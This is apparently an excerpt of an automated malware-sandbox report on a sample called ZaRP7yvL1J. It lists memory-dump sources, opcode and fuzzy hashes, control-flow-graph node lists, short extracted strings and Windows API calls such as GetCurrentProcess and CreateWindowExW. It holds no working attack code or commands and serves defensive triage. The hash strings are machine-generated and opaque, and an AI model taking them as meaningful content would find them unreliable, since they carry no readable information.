                                                                                                            • Instruction ID: 02b6abef8b513a469a49430aef1069fb42b5f4fda6bbf00eb7798e4f97a7f594
                                                                                                            • Opcode Fuzzy Hash: 20a81546c5228f862747506a097c0f2d01cd255238368ecd5ba403e83b1677b1
                                                                                                            • Instruction Fuzzy Hash: D47182B5E006588FEB68CF6AC944B9DBBF2AF89300F14C1EAD40DA7255DB344A85CF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b77fd30a36f3cd3edbf39ca9ae5205144a8c66524b4a6e53977f67908c83cd69
                                                                                                            • Instruction ID: d747426b93870407c6a2dd6f5bb9d22485c98a18e264cdb5db302ed6ba344115
                                                                                                            • Opcode Fuzzy Hash: b77fd30a36f3cd3edbf39ca9ae5205144a8c66524b4a6e53977f67908c83cd69
                                                                                                            • Instruction Fuzzy Hash: 6E611934A40219DFDB25DF64C950BADBBB7FB88300F1084A9EA0977764DA329D82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 132fab7de34a0b97eaf0c872d4201d585431ef0fa6e39616b92e50015e6000c6
                                                                                                            • Instruction ID: c2643786fc1698dbe6424fa3e48ac219eae30e781a5677f94ade2704989f69cb
                                                                                                            • Opcode Fuzzy Hash: 132fab7de34a0b97eaf0c872d4201d585431ef0fa6e39616b92e50015e6000c6
                                                                                                            • Instruction Fuzzy Hash: F7418CB5D016588BEB58CF6BC945789FBF3AFC9200F04C1EAC54CAB265DB740A868F11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 09e6dab0e815538c7de70a02c49ba1d4594a1e3e59cff87e47cc0b0db5bca75f
                                                                                                            • Instruction ID: ac36ba7f72f89349db806412589ce568aba711cd0bc38aa76ba78fddb98f5ac0
                                                                                                            • Opcode Fuzzy Hash: 09e6dab0e815538c7de70a02c49ba1d4594a1e3e59cff87e47cc0b0db5bca75f
                                                                                                            • Instruction Fuzzy Hash: 334179B1E016588BEB58CF6BC9457C9FAF3AFC9300F14C1AAC50CA7264DB740A868F51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 d66b8-d66ed 1 d6b1c-d6b20 0->1 2 d66f3-d6716 0->2 3 d6b39-d6b47 1->3 4 d6b22-d6b36 1->4 11 d671c-d6729 2->11 12 d67c4-d67c8 2->12 9 d6b49-d6b5e 3->9 10 d6bb8-d6bcd 3->10 18 d6b65-d6b72 9->18 19 d6b60-d6b63 9->19 20 d6bcf-d6bd2 10->20 21 d6bd4-d6be1 10->21 25 d6738 11->25 26 d672b-d6736 11->26 15 d67ca-d67d8 12->15 16 d6810-d6819 12->16 15->16 30 d67da-d67f5 15->30 22 d6c2f 16->22 23 d681f-d6829 16->23 27 d6b74-d6bb5 18->27 19->27 28 d6be3-d6c1e 20->28 21->28 31 d6c34-d6c64 22->31 23->1 29 d682f-d6838 23->29 32 d673a-d673c 25->32 26->32 75 d6c25-d6c2c 28->75 35 d683a-d683f 29->35 36 d6847-d6853 29->36 56 d67f7-d6801 30->56 57 d6803 30->57 60 d6c7d-d6c84 31->60 61 d6c66-d6c7c 31->61 32->12 39 d6742-d67a4 32->39 35->36 36->31 37 d6859-d685f 36->37 43 d6865-d6875 37->43 44 d6b06-d6b0a 37->44 88 d67aa-d67c1 39->88 89 d67a6 39->89 58 d6889-d688b 43->58 59 d6877-d6887 43->59 44->22 48 d6b10-d6b16 44->48 48->1 48->29 62 d6805-d6807 56->62 57->62 63 d688e-d6894 58->63 59->63 62->16 70 d6809 62->70 63->44 71 d689a-d68a9 63->71 70->16 72 d68af 71->72 73 d6957-d6982 call d6500 * 2 71->73 77 d68b2-d68c3 72->77 90 d6a6c-d6a86 73->90 91 d6988-d698c 73->91 77->31 79 d68c9-d68db 77->79 79->31 82 d68e1-d68f9 79->82 144 d68fb call d6c88 82->144 145 d68fb call d6c98 82->145 84 d6901-d6911 84->44 87 d6917-d691a 84->87 92 d691c-d6922 87->92 93 d6924-d6927 87->93 88->12 89->88 90->1 111 d6a8c-d6a90 90->111 91->44 94 d6992-d6996 91->94 92->93 95 d692d-d6930 92->95 93->22 93->95 98 d69be-d69c4 94->98 99 d6998-d69a5 94->99 100 d6938-d693b 95->100 101 d6932-d6936 95->101 103 d69ff-d6a05 98->103 104 d69c6-d69ca 98->104 114 d69b4 99->114 115 d69a7-d69b2 99->115 100->22 102 d6941-d6945 100->102 101->100 101->102 102->22 109 d694b-d6951 102->109 106 d6a07-d6a0b 103->106 107 d6a11-d6a17 103->107 104->103 110 d69cc-d69d5 104->110 106->75 106->107 112 d6a19-d6a1d 107->112 113 d6a23-d6a25 107->113 109->73 109->77 116 d69e4-d69fa 110->116 117 d69d7-d69dc 110->117 118 d6acc-d6ad0 111->118 119 d6a92-d6a9c call d53a8 111->119 112->44 112->113 120 d6a5a-d6a5c 113->120 121 d6a27-d6a30 113->121 122 d69b6-d69b8 114->122 115->122 116->44 117->116 118->75 124 d6ad6-d6ada 118->124 119->118 132 d6a9e-d6ab3 119->132 120->44 129 d6a62-d6a69 120->129 127 d6a3f-d6a55 121->127 128 d6a32-d6a37 121->128 122->44 122->98 124->75 130 d6ae0-d6aed 124->130 127->44 128->127 135 d6afc 130->135 136 d6aef-d6afa 130->136 132->118 141 d6ab5-d6aca 132->141 138 d6afe-d6b00 135->138 136->138 138->44 138->75 141->1 141->118 144->84 145->84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                            • API String ID: 0-1932283790
                                                                                                            • Opcode ID: 8877a4dbc1552a91c1b44f0cfcbfc411440f671611bffbc91b5bdd699e22e8af
                                                                                                            • Instruction ID: 9e5519478ef6e6ae0f68a5f323c226fafa14f2019a62993a5fdc705465dd1ced
                                                                                                            • Opcode Fuzzy Hash: 8877a4dbc1552a91c1b44f0cfcbfc411440f671611bffbc91b5bdd699e22e8af
                                                                                                            • Instruction Fuzzy Hash: DC125B30A002089FCB64CF69D994AAEBBF2FF48314F15856AE455DB361DB32ED45CB60

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 396 390e0970-390e0a0f GetCurrentProcess 400 390e0a18-390e0a4c GetCurrentThread 396->400 401 390e0a11-390e0a17 396->401 402 390e0a4e-390e0a54 400->402 403 390e0a55-390e0a89 GetCurrentProcess 400->403 401->400 402->403 405 390e0a8b-390e0a91 403->405 406 390e0a92-390e0aaa 403->406 405->406 417 390e0aad call 390e0b4f 406->417 418 390e0aad call 390e0f31 406->418 408 390e0ab3-390e0ae2 GetCurrentThreadId 410 390e0aeb-390e0b4d 408->410 411 390e0ae4-390e0aea 408->411 411->410 417->408 418->408
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 390E09FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 390E0A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 390E0A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 390E0AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 0b2e0dacafb80bb4486d3c298b40a21cbb5654469d178f923d3c77f3aacaaaf9
                                                                                                            • Instruction ID: d5fa7ff1c5a2c4951461c5e6d80c1f5262e65013e4315677b5581fda0f811de8
                                                                                                            • Opcode Fuzzy Hash: 0b2e0dacafb80bb4486d3c298b40a21cbb5654469d178f923d3c77f3aacaaaf9
                                                                                                            • Instruction Fuzzy Hash: 9C5146B09006498FDB04CFA9C548BDEFFF1EF88314F2484AAD459A7661D734A980CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 419 390e0980-390e0a0f GetCurrentProcess 423 390e0a18-390e0a4c GetCurrentThread 419->423 424 390e0a11-390e0a17 419->424 425 390e0a4e-390e0a54 423->425 426 390e0a55-390e0a89 GetCurrentProcess 423->426 424->423 425->426 428 390e0a8b-390e0a91 426->428 429 390e0a92-390e0aaa 426->429 428->429 440 390e0aad call 390e0b4f 429->440 441 390e0aad call 390e0f31 429->441 431 390e0ab3-390e0ae2 GetCurrentThreadId 433 390e0aeb-390e0b4d 431->433 434 390e0ae4-390e0aea 431->434 434->433 440->431 441->431
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 390E09FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 390E0A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 390E0A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 390E0AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: ff57df95cfef5300833fdaea2b4c57dca2f9e82fa4d35bf8c8d837481fee07d5
                                                                                                            • Instruction ID: 7217b8098e9558a63b95a50080f99b835ef1b8981e97073bdc015ec98f5591d4
                                                                                                            • Opcode Fuzzy Hash: ff57df95cfef5300833fdaea2b4c57dca2f9e82fa4d35bf8c8d837481fee07d5
                                                                                                            • Instruction Fuzzy Hash: F15136B09006498FDB04CFA9C648BDEFBF1EF88314F248469D459A7661DB74A980CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1352 d7458-d7946 1427 d794c-d795c 1352->1427 1428 d7e98-d7ecd 1352->1428 1427->1428 1429 d7962-d7972 1427->1429 1433 d7ecf-d7ed4 1428->1433 1434 d7ed9-d7ef7 1428->1434 1429->1428 1430 d7978-d7988 1429->1430 1430->1428 1432 d798e-d799e 1430->1432 1432->1428 1435 d79a4-d79b4 1432->1435 1436 d7fbe-d7fc3 1433->1436 1445 d7f6e-d7f7a 1434->1445 1446 d7ef9-d7f03 1434->1446 1435->1428 1437 d79ba-d79ca 1435->1437 1437->1428 1439 d79d0-d79e0 1437->1439 1439->1428 1440 d79e6-d79f6 1439->1440 1440->1428 1442 d79fc-d7a0c 1440->1442 1442->1428 1444 d7a12-d7a22 1442->1444 1444->1428 1447 d7a28-d7e97 1444->1447 1452 d7f7c-d7f88 1445->1452 1453 d7f91-d7f9d 1445->1453 1446->1445 1451 d7f05-d7f11 1446->1451 1461 d7f36-d7f39 1451->1461 1462 d7f13-d7f1e 1451->1462 1452->1453 1463 d7f8a-d7f8f 1452->1463 1458 d7f9f-d7fab 1453->1458 1459 d7fb4-d7fb6 1453->1459 1458->1459 1472 d7fad-d7fb2 1458->1472 1459->1436 1464 d7f3b-d7f47 1461->1464 1465 d7f50-d7f5c 1461->1465 1462->1461 1474 d7f20-d7f2a 1462->1474 1463->1436 1464->1465 1475 d7f49-d7f4e 1464->1475 1468 d7f5e-d7f65 1465->1468 1469 d7fc4-d7fe6 1465->1469 1468->1469 1473 d7f67-d7f6c 1468->1473 1478 d7fe8 1469->1478 1479 d7ff6 1469->1479 1472->1436 1473->1436 1474->1461 1484 d7f2c-d7f31 1474->1484 1475->1436 1478->1479 1482 d7fef-d7ff4 1478->1482 1483 d7ff8-d7ff9 1479->1483 1482->1483 1484->1436
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 5d3d6e4daa546f2b86280747b2f712944f0705b7140e72aadd23f3283b815127
                                                                                                            • Instruction ID: 5d29e7359999649c522ff3deae982644eed3ef578a1c1db3ffa342481c169c40
                                                                                                            • Opcode Fuzzy Hash: 5d3d6e4daa546f2b86280747b2f712944f0705b7140e72aadd23f3283b815127
                                                                                                            • Instruction Fuzzy Hash: ED522374A0421CCFEB249BA4C960B9EBBB7EF44300F1081A9D10A6B765DF359E49EF51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1543 d4f00-d4f22 1544 d4f38-d4f43 1543->1544 1545 d4f24-d4f28 1543->1545 1548 d4f49-d4f4b 1544->1548 1549 d4feb-d5017 1544->1549 1546 d4f2a-d4f36 1545->1546 1547 d4f50-d4f57 1545->1547 1546->1544 1546->1547 1551 d4f59-d4f60 1547->1551 1552 d4f77-d4f80 1547->1552 1550 d4fe3-d4fe8 1548->1550 1555 d501e-d5076 1549->1555 1551->1552 1553 d4f62-d4f6d 1551->1553 1647 d4f82 call d4ef0 1552->1647 1648 d4f82 call d4f00 1552->1648 1553->1555 1556 d4f73-d4f75 1553->1556 1575 d5078-d507e 1555->1575 1576 d5085-d5097 1555->1576 1556->1550 1557 d4f88-d4f8a 1559 d4f8c-d4f90 1557->1559 1560 d4f92-d4f9a 1557->1560 1559->1560 1561 d4fad-d4fcc 1559->1561 1562 d4f9c-d4fa1 1560->1562 1563 d4fa9-d4fab 1560->1563 1569 d4fce-d4fd7 1561->1569 1570 d4fe1 1561->1570 1562->1563 1563->1550 1645 d4fd9 call d9f6d 1569->1645 1646 d4fd9 call d9eb0 1569->1646 1570->1550 1572 d4fdf 1572->1550 1575->1576 1578 d509d-d50a1 1576->1578 1579 d512b-d512f call d52c8 1576->1579 1580 d50b1-d50be 1578->1580 1581 d50a3-d50af 1578->1581 1582 d5135-d513b 1579->1582 1589 d50c0-d50ca 1580->1589 1581->1589 1583 d513d-d5143 1582->1583 1584 d5147-d514e 1582->1584 1587 d51a9-d5208 1583->1587 1588 d5145 1583->1588 1603 d520f-d5233 1587->1603 1588->1584 1592 d50cc-d50db 1589->1592 1593 d50f7-d50fb 1589->1593 1601 d50dd-d50e4 1592->1601 1602 d50eb-d50f5 1592->1602 1594 d50fd-d5103 1593->1594 1595 d5107-d510b 1593->1595 1598 d5105 1594->1598 1599 d5151-d51a2 1594->1599 1595->1584 1600 d510d-d5111 1595->1600 1598->1584 1599->1587 1600->1603 1604 d5117-d5129 1600->1604 1601->1602 1602->1593 1612 d5239-d523b 1603->1612 1613 d5235-d5237 1603->1613 1604->1584 1617 d523d-d5241 1612->1617 1618 d524c-d524e 1612->1618 1616 d52b1-d52b4 1613->1616 1619 d5247-d524a 1617->1619 1620 d5243-d5245 1617->1620 1621 d5261-d5267 1618->1621 1622 d5250-d5254 1618->1622 1619->1616 1620->1616 1627 d5269-d5290 1621->1627 1628 d5292-d5294 1621->1628 1625 d525a-d525f 1622->1625 1626 d5256-d5258 1622->1626 1625->1616 1626->1616 1630 d529b-d529d 1627->1630 1628->1630 1634 d529f-d52a1 1630->1634 1635 d52a3-d52a5 1630->1635 1634->1616 1636 d52ae 1635->1636 1637 d52a7-d52ac 1635->1637 1636->1616 1637->1616 1645->1572 1646->1572 1647->1557 1648->1557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Hbq$Hbq
                                                                                                            • API String ID: 0-4258043069
                                                                                                            • Opcode ID: ff0d14c8306c9bae53ecb250289d4dba9fb44dfb69d8e573a8d70e55906552ab
                                                                                                            • Instruction ID: f72e4888aede0ab07d940b1dc0b1b795ee3e7e9cbc04b21d9af256b633231b1b
                                                                                                            • Opcode Fuzzy Hash: ff0d14c8306c9bae53ecb250289d4dba9fb44dfb69d8e573a8d70e55906552ab
                                                                                                            • Instruction Fuzzy Hash: 6BB1BB347046548FDB259F28C854B7E7BE2AB89341F14852AE846CB7A5DF38CC42DBA1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 9f21294218b1122add093f3044143fa1ab637576f978e7ef18777611746485d1
                                                                                                            • Instruction ID: 6561357f4de681f915c40e29b4e609356bf216acb2eaa91d588d200a1620368c
                                                                                                            • Opcode Fuzzy Hash: 9f21294218b1122add093f3044143fa1ab637576f978e7ef18777611746485d1
                                                                                                            • Instruction Fuzzy Hash: 01B17F70A007058FCB55CF69C484ABEBBF6AF84300F19C96AE405DB352DB35ED468BA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1976 d5460-d546d 1977 d546f-d5473 1976->1977 1978 d5475-d5477 1976->1978 1977->1978 1979 d547c-d5487 1977->1979 1980 d5688-d568f 1978->1980 1981 d548d-d5494 1979->1981 1982 d5690 1979->1982 1983 d5629-d562f 1981->1983 1984 d549a-d54a9 1981->1984 1986 d5695-d56cd 1982->1986 1987 d5635-d5639 1983->1987 1988 d5631-d5633 1983->1988 1985 d54af-d54be 1984->1985 1984->1986 1994 d54c0-d54c3 1985->1994 1995 d54d3-d54d6 1985->1995 2008 d56cf-d56d4 1986->2008 2009 d56d6-d56da 1986->2009 1989 d563b-d5641 1987->1989 1990 d5686 1987->1990 1988->1980 1989->1982 1992 d5643-d5646 1989->1992 1990->1980 1992->1982 1996 d5648-d565d 1992->1996 1997 d54c5-d54c8 1994->1997 1998 d54e2-d54e8 1994->1998 1995->1998 1999 d54d8-d54db 1995->1999 2018 d565f-d5665 1996->2018 2019 d5681-d5684 1996->2019 2003 d54ce 1997->2003 2004 d55c9-d55cf 1997->2004 2001 d54ea-d54f0 1998->2001 2002 d5500-d551d 1998->2002 2005 d54dd 1999->2005 2006 d552e-d5534 1999->2006 2011 d54f4-d54fe 2001->2011 2012 d54f2 2001->2012 2049 d5526-d5529 2002->2049 2015 d55f4-d5601 2003->2015 2013 d55e7-d55f1 2004->2013 2014 d55d1-d55d7 2004->2014 2005->2015 2016 d554c-d555e 2006->2016 2017 d5536-d553c 2006->2017 2010 d56e0-d56e2 2008->2010 2009->2010 2022 d56e4-d56f6 2010->2022 2023 d56f7-d56fe 2010->2023 2011->2002 2012->2002 2013->2015 2025 d55d9 2014->2025 2026 d55db-d55e5 2014->2026 2035 d5615-d5617 2015->2035 2036 d5603-d5607 2015->2036 2039 d556e-d5591 2016->2039 2040 d5560-d556c 2016->2040 2027 d553e 2017->2027 2028 d5540-d554a 2017->2028 2020 d5677-d567a 2018->2020 2021 d5667-d5675 2018->2021 2019->1980 2020->1982 2031 d567c-d567f 2020->2031 2021->1982 2021->2020 2025->2013 2026->2013 2027->2016 2028->2016 2031->2018 2031->2019 2044 d561b-d561e 2035->2044 2036->2035 2043 d5609-d560d 2036->2043 2039->1982 2052 d5597-d559a 2039->2052 2050 d55b9-d55c7 2040->2050 2043->1982 2045 d5613 2043->2045 2044->1982 2046 d5620-d5623 2044->2046 2045->2044 2046->1983 2046->1984 2049->2015 2050->2015 2052->1982 2054 d55a0-d55b2 2052->2054 2054->2050
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ,bq$,bq
                                                                                                            • API String ID: 0-2699258169
                                                                                                            • Opcode ID: c7c309e14dbb0b582d593c6dadeafdfccfbbf97487f093306c03a52a177ab399
                                                                                                            • Instruction ID: 12934a8f806b5d51beb1a28f282794b73cb0930fdf58526f0fdc94880e9357e3
                                                                                                            • Opcode Fuzzy Hash: c7c309e14dbb0b582d593c6dadeafdfccfbbf97487f093306c03a52a177ab399
                                                                                                            • Instruction Fuzzy Hash: 06819F34A00A058FCB54CF69CC949AEB7F2BF89316B65816AD805DB365DB31EC41CFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2202 387ad548-387ad66d 2221 387ad673-387ad6b9 2202->2221 2222 387ad710-387ad741 2202->2222 2227 387ad6bb-387ad6bf 2221->2227 2228 387ad6c4-387ad70f 2221->2228 2229 387ad747-387ad75e 2222->2229 2227->2228
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951508317.00000000387A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 387A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_387a0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 7de8a2fb7d88eec6d2ad21993ee3b361904418491fb9110d7c1c8be27a2207d8
                                                                                                            • Instruction ID: bacbc813b3f8fbe08fccd786a68d000f5c906d3e52ffc5933ddaadb003e4482c
                                                                                                            • Opcode Fuzzy Hash: 7de8a2fb7d88eec6d2ad21993ee3b361904418491fb9110d7c1c8be27a2207d8
                                                                                                            • Instruction Fuzzy Hash: 8B518170E002099FCB05DFA8D855AEEBBB2FF85300F1085A9E505AB366DB359D45CF61

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2237 d8bf0-d8c11 2238 d8c19-d8c20 2237->2238 2275 d8c13 call d89d0 2237->2275 2276 d8c13 call d8bf0 2237->2276 2239 d8c2c-d8c4c 2238->2239 2240 d8c22-d8c27 2238->2240 2243 d8c4e-d8c50 2239->2243 2244 d8c87-d8c89 2239->2244 2241 d8cf5-d8cfc 2240->2241 2247 d8c5f-d8c66 2243->2247 2248 d8c52-d8c57 2243->2248 2245 d8c8b-d8c91 2244->2245 2246 d8cf0 2244->2246 2245->2246 2251 d8c93-d8cae 2245->2251 2246->2241 2249 d8c6c-d8c85 2247->2249 2250 d8cff-d8d2b call d85e8 2247->2250 2248->2247 2249->2241 2262 d8d2d-d8d37 2250->2262 2263 d8d39-d8d42 call d85e8 2250->2263 2256 d8ce5-d8ce7 2251->2256 2257 d8cb0-d8cb2 2251->2257 2256->2246 2258 d8ce9-d8cee 2256->2258 2260 d8cb4-d8cb9 2257->2260 2261 d8cc1-d8cc8 2257->2261 2258->2241 2260->2261 2261->2250 2264 d8cca-d8ce3 2261->2264 2262->2263 2269 d8d44-d8d4e 2263->2269 2270 d8d50-d8d5e call d8d90 2263->2270 2264->2241 2269->2270 2272 d8d64-d8d8d 2270->2272 2275->2238 2276->2238
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4'^q$4'^q
                                                                                                            • API String ID: 0-2697143702
                                                                                                            • Opcode ID: 3cdabdb927fde4c1889a687b878b577589de829a1e66278519f3a85d16b4f8b2
                                                                                                            • Instruction ID: c2fcdf31d71df21752fe6b7865051284efe296b3fda0ee6c24fa0f5aa399ab7c
                                                                                                            • Opcode Fuzzy Hash: 3cdabdb927fde4c1889a687b878b577589de829a1e66278519f3a85d16b4f8b2
                                                                                                            • Instruction Fuzzy Hash: 9A517D307112089FEB149B69C844BAE7BE7EF88350F14C466E909CB3A5DB75DD019B71
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq
                                                                                                            • API String ID: 0-1243427068
                                                                                                            • Opcode ID: 97d6fcd32e362ed29e63ac9f215f72a1c2737ce2816e344ea3db4160860b880f
                                                                                                            • Instruction ID: 2611d36bb80a91b3a4ccaddab37c2ae755615ed5d5b025cdda08e25dad5cb13f
                                                                                                            • Opcode Fuzzy Hash: 97d6fcd32e362ed29e63ac9f215f72a1c2737ce2816e344ea3db4160860b880f
                                                                                                            • Instruction Fuzzy Hash: 3031C331B043158BDF684A79899427EA6E6BFE4301F19443FE80693394DB74CC45D771
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 390E0222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 6cb30a8d8cd9056cb69bf41b7e732cec7044bf40f6ac00cfb87a2623d02c9364
                                                                                                            • Instruction ID: 18ed3abd00b08642734d7b329e96f6fb8c9e1bd2aff1b87abe9a1c95221b2c88
                                                                                                            • Opcode Fuzzy Hash: 6cb30a8d8cd9056cb69bf41b7e732cec7044bf40f6ac00cfb87a2623d02c9364
                                                                                                            • Instruction Fuzzy Hash: 3F815B71C09389AFDB02CFA9C9909CDBFB1BF4A310F1981DAE448AB262C7759845CF51
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 390E0222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: a897c6a190ac3e144c926c1abcc289a0d9eac37c09686901fe69aa525b355032
                                                                                                            • Instruction ID: 190126947fae3441e7b42f24b05364d999bffb0e2c8745ac9777462383c46617
                                                                                                            • Opcode Fuzzy Hash: a897c6a190ac3e144c926c1abcc289a0d9eac37c09686901fe69aa525b355032
                                                                                                            • Instruction Fuzzy Hash: 0351D0B1D043499FDB14CFA9D980ADEBFF5BF49310F24856AE418AB210D771A881CF91
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 390E0222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
